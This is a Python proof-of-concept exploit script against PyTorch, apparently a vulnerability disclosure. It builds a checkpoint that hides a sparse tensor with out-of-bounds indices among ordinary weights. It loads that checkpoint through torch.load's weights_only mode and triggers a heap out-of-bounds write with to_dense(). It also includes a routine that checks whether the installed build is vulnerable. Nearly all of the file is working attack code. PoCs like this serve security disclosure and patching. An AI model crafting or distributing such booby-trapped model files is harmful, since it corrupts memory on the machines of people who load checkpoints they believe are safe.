"""
PoC: Sparse Tensor OOB Memory Corruption via torch.load(weights_only=True)

This PoC demonstrates that a crafted .pt file containing a sparse tensor
with out-of-bounds indices can be loaded with weights_only=True (the default
safe mode) and cause heap memory corruption when the tensor is used.

The root cause is that _validate_loaded_sparse_tensors() skips validation
when check_sparse_tensor_invariants is disabled (the default since PyTorch 2.8.0).

IMPACT: Heap OOB write when .to_dense() is called on the loaded sparse tensor.
AFFECTED: PyTorch >= 2.8.0 with weights_only=True (default since 2.6.0)

Usage:
    python poc_sparse_oob.py --create   # Creates malicious_model.pt
    python poc_sparse_oob.py --load    # Loads and triggers the bug
    python poc_sparse_oob.py --check   # Checks if current PyTorch is vulnerable
"""
| |
|
| | import argparse |
| | import sys |
| | import os |
| |
|
| |
|
def check_vulnerability():
    """Probe the running PyTorch build for the unvalidated-sparse-load condition.

    Three conditions are tested in order: torch is importable, sparse tensor
    invariant checks are globally disabled, and _rebuild_sparse_tensor is on
    the weights_only allowlist. Finally a valid probe tensor is pushed through
    _validate_loaded_sparse_tensors() to observe whether validation runs.

    Returns:
        bool: True if sparse tensors restored by torch.load would not be
        validated (the PoC applies), False otherwise.
    """
    try:
        import torch
    except ImportError:
        print("[!] PyTorch is not installed. Install it to test.")
        return False

    print(f"[*] PyTorch version: {torch.__version__}")

    checks_on = torch.sparse.check_sparse_tensor_invariants.is_enabled()
    print(f"[*] Sparse tensor invariant checks enabled: {checks_on}")
    if checks_on:
        print("[*] NOT VULNERABLE: Sparse tensor invariant checks are enabled.")
        print("    This means _validate_loaded_sparse_tensors() will catch OOB indices.")
        return False

    from torch._weights_only_unpickler import _get_allowed_globals

    if "torch._utils._rebuild_sparse_tensor" not in _get_allowed_globals():
        print("[*] _rebuild_sparse_tensor is NOT in the weights_only allowlist")
        print("    NOT VULNERABLE via this vector.")
        return False
    print("[*] _rebuild_sparse_tensor IS in the weights_only allowlist")

    from torch._utils import _sparse_tensors_to_validate, _validate_loaded_sparse_tensors

    # Push a (valid) probe tensor through the post-load validation hook and
    # observe what happens to the pending-validation list afterwards.
    probe = torch.sparse_coo_tensor(
        torch.tensor([[0]]),
        torch.tensor([1.0]),
        (10,),
        check_invariants=False,
    )
    _sparse_tensors_to_validate.append(probe)
    _validate_loaded_sparse_tensors()

    if _sparse_tensors_to_validate:
        print("[*] _validate_loaded_sparse_tensors() performed validation")
        return False
    print("[*] _validate_loaded_sparse_tensors() SKIPPED validation (list cleared)")
    print("[!] VULNERABLE: Sparse tensors loaded from files are NOT validated!")
    return True
| |
|
| |
|
def create_malicious_model(output_path="malicious_model.pt"):
    """Write a checkpoint whose 'sparse_layer' entry carries OOB indices.

    Args:
        output_path: destination for the crafted .pt file.

    Returns:
        str: the path the checkpoint was written to.
    """
    import torch

    print(f"[*] Creating malicious model file: {output_path}")

    # One index (999999) lies far past the declared dimension of 10.
    bad_indices = torch.tensor([[0, 7, 999999]])
    bad_values = torch.tensor([1.0, 2.0, 3.0])
    declared_size = torch.Size([10])

    # Invariant checking is suppressed both via the context manager and the
    # constructor flag, otherwise torch would reject the OOB indices here.
    with torch.sparse.check_sparse_tensor_invariants(False):
        crafted = torch.sparse_coo_tensor(
            bad_indices, bad_values, declared_size, check_invariants=False
        )

    # Bury the crafted tensor in an otherwise ordinary-looking state dict.
    payload = {
        "weight": torch.randn(10, 10),
        "bias": torch.randn(10),
        "sparse_layer": crafted,
    }

    torch.save(payload, output_path)
    print(f"[+] Malicious model saved to {output_path}")
    print(f"    File size: {os.path.getsize(output_path)} bytes")
    print("[*] The 'sparse_layer' key contains a sparse tensor with OOB indices")
    print(f"    Declared size: {declared_size}")
    print(f"    Max index in indices: {bad_indices.max().item()}")
    return output_path
| |
|
| |
|
def load_and_trigger(model_path="malicious_model.pt", *, interactive=True):
    """Load the malicious model and trigger the OOB memory access.

    Args:
        model_path: path to the file produced by create_malicious_model().
        interactive: when True (the default, preserving the original
            behavior), wait for the user to press Enter before triggering
            the OOB write. Set False for unattended runs -- the original
            unconditional input() raises EOFError when stdin is closed
            (e.g. in CI or when piped), aborting the PoC before the trigger.

    Side effects:
        Reads model_path from disk; calling .to_dense() on the loaded tensor
        may corrupt heap memory or crash the process (that is the point).
    """
    import torch

    print(f"[*] Loading model from: {model_path}")
    print(f"[*] Using weights_only=True (the default safe mode)")

    # weights_only=True is the "safe" path under test; no pickle escape needed.
    state_dict = torch.load(model_path, weights_only=True)

    print(f"[+] Model loaded successfully with weights_only=True")
    print(f"[*] Keys in state_dict: {list(state_dict.keys())}")

    sparse_tensor = state_dict["sparse_layer"]
    print(f"[*] Sparse tensor loaded:")
    print(f"    Layout: {sparse_tensor.layout}")
    print(f"    Size: {sparse_tensor.size()}")
    print(f"    Indices shape: {sparse_tensor._indices().shape}")
    print(f"    Max index: {sparse_tensor._indices().max().item()}")
    print(f"    Invariant checks enabled: {torch.sparse.check_sparse_tensor_invariants.is_enabled()}")

    print()
    print("[!] About to call .to_dense() -- this will trigger OOB memory write!")
    print("[!] The tensor has index 999999 but size is only 10")
    print("[!] This writes to memory offset 999999 * sizeof(float) = ~4MB past buffer end")
    print()

    # Only prompt when an operator is present; skipping the prompt keeps the
    # PoC usable in non-interactive harnesses.
    if interactive:
        input("Press Enter to trigger the OOB write (or Ctrl+C to abort)... ")

    try:
        dense = sparse_tensor.to_dense()
        print(f"[!] to_dense() completed (memory may be corrupted)")
        print(f"    Dense shape: {dense.shape}")
        print(f"    Dense values: {dense}")
    except Exception as e:
        print(f"[!] Exception during to_dense(): {type(e).__name__}: {e}")
| |
|
| |
|
def main():
    """Parse the command line and dispatch the selected PoC action(s)."""
    parser = argparse.ArgumentParser(
        description="PoC: Sparse Tensor OOB via torch.load(weights_only=True)"
    )
    # The three mode flags share the same shape; declare them in one pass.
    for flag, text in (
        ("--create", "Create the malicious model file"),
        ("--load", "Load the malicious model and trigger the bug"),
        ("--check", "Check if the current PyTorch is vulnerable"),
    ):
        parser.add_argument(flag, action="store_true", help=text)
    parser.add_argument(
        "--output",
        default="malicious_model.pt",
        help="Output path for the malicious model file",
    )
    args = parser.parse_args()

    # With no mode selected there is nothing to do but explain usage.
    if not (args.create or args.load or args.check):
        parser.print_help()
        return

    if args.check:
        # Exit status encodes the verdict: 0 = vulnerable, 1 = not.
        sys.exit(0 if check_vulnerability() else 1)

    if args.create:
        create_malicious_model(args.output)

    if args.load:
        load_and_trigger(args.output)
| |
|
| |
|
# Run the CLI dispatcher only when executed as a script, not on import.
if __name__ == "__main__":
    main()
| |
|